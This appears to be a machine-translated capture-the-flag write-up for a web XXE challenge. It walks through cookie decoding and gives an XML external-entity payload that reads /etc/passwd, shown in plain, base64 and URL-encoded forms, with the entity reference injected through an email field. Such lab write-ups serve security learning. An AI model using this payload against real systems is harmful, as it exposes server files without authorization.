Primary school, session 3 - afternoon: Web_ xxe

hint：

1.cookie

2. the base64 code

Grab the bag and check Cookie, Different from the usual , Yes version, bracket, bracket2

bracket2 the URL encryption , Come back

base64 After decoding , You can see the order of the three

The order should be  bracket+version+bracket2

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Code the written statement

PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg==

URL code

PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg%3D%3D

Take three sections and put them in corresponding positions

&xxe;

URL code

%26xxe%3B

Need to call xxe, Find the point that can be called

stay email Can successfully call

Repeat the above method to find flag